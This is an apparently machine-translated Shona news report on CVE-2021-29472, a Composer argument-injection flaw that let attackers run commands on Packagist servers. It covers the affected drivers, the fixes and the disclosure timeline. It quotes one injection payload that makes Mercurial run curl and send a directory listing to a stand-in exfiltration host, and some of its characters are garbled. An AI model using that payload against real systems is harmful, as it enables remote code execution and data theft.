Kusagadzikana kwakanyanya (CVE-2021-29472) kwaonekwa muComposer dependency maneja iyo inobvumira mirairo yekupokana kuti iitwe pasystem kana uchigadzira pasuru ine yakanyatso kurongeka URL kukosha inotsanangura kero yekudhawunirodha kodhi kodhi. Dambudziko rinoitika muGitDriver, SvnDriver, uye HgDriver zvikamu zvinoshandiswa paunenge uchishandisa Git, Subversion, uye Mercurial source control system. Kusagadzikana kwakagadziriswa muComposer kuburitswa 1.10.22 uye 2.0.13.
Zvinonyatso cherechedzwa kuti nyaya yacho yakanyanya kukanganisa Composer's default package repository, Packagist, iyo ine mazana matatu nemazana matanhatu emapakeji evagadziri vePHP uye ino shandisa zvinopfuura bhiriyoni 306 kurodha pamwedzi. Kuedza kwakaratidza kuti kana paine ruzivo rwedambudziko, vanorwisa vaigona kuwana hutongi hwePackagist zvivakwa uye kubata hunhu hwevanochengetedza kana kuendesa pasuru kurodha kune yechitatu-bato server, kuronga kuendeswa kwemapakeji akasiyana nekuchinja kwakashata kutsiva backdoor. panguva yekutsamira yekuisa maitiro.
Ngozi yevashandisi vekupedzisira inongogumira kune izvo zviri mucomposer.json zvinowanzogadziriswa nemushandisi, uye masource link anotapurirwa kana uchinge wawana wechitatu-party repositories, iyo inowanzovimbika. Kurova kukuru kwakawira paPackagist.org repository uye Private Packagist sevhisi, iyo yakadana Muumbi nekuendeswa kwedata rakagamuchirwa kubva kuvashandisi. Vanorwisa vaigona kuita kodhi yavo pamaseva ePackagist nekuisa pasuru yakagadzirwa.
Chikwata chePackagist chakagadzirisa kusagadzikana mukati memaawa gumi nemaviri ekusagadzikana kuri kutaurwa. Vatsvakurudzi vakazivisa pachivande vagadziri vePackagist musi waApril 12, uye dambudziko rakagadziriswa zuva rimwe chete. Rudzi rweruzhinji rweMunyori anogadzirisa kusagadzikana kwakabudiswa muna Kubvumbi 22, neruzivo rwakaziviswa muna Kubvumbi 27. Ongororo yematanda pamaseva ePackagist haina kuratidza chero chiitiko chekufungidzira chine chekuita nekusagadzikana.
Dambudziko rinokonzerwa nebug muURL yekusimbisa kodhi mumudziyo composer.json faira uye source download links. Iko kukanganisa kwave kuripo mukodhi kubva munaNovember 2011. Packagist anoshandisa akasarudzika akaturikidzana kuronga kodhi kurodha pasina kusungirirwa kune yakatarwa sosi yekudzora sisitimu, iyo inoitwa nekufona "kubva kuShellCommandline" uye kupfuudza mutsara wemirairo nharo. Semuyenzaniso, yegit, murairo we "git ls-remote -heads $URL" unonzi, apo URL inogadziriswa uchishandisa "ProcessExecutor::escape($url)" nzira, kupukunyuka zvivakwa zvine ngozi zvakaita se "$(. ..)" kana "` ...`".
Chinokosha chedambudziko ndechekuti ProcessExecutor:: nzira yekupukunyuka haina kupukunyuka iyo "-" kutevedzana, iyo yakabvumira chero yekuwedzera yekufona parameter kuti itsanangurwe muURL. Kupukunyuka kwakadaro kwakanga kusina muGitDriver.php, SvnDriver.php uye HgDriver.php vatyairi. Kurwiswa kweGitDriver.php kwakakanganiswa nenyaya yekuti "git ls-remote" murairo hauna kutsigira kutsanangura dzimwe nharo mushure menzira. Kurwiswa kweHgDriver.php kwakagoneka nekupfuura "--config" parameter kune "hq" utility, iyo inokubvumira kuronga kuitwa kwechero murairo kuburikidza nekugadzirisa "alias.identify" kugadzirisa. Semuenzaniso, kudhawunirodha nekuita kodhi nekumhanyisa curl utility, unogona kutsanangura: βconfig=alias.identify=!curl http://exfiltration-host.tld βdata β$(ls -alh)β
Nekutumira bvunzo pasuru ine yakafanana URL kuPackagist, vaongorori vakasimbisa kuti mushure mekutumira, sevha yavo yakagamuchira chikumbiro cheHTTP kubva kune imwe yePackagist maseva muAWS ine runyorwa rwemafaira mune yazvino dhairekitori.
Source: opennet.ru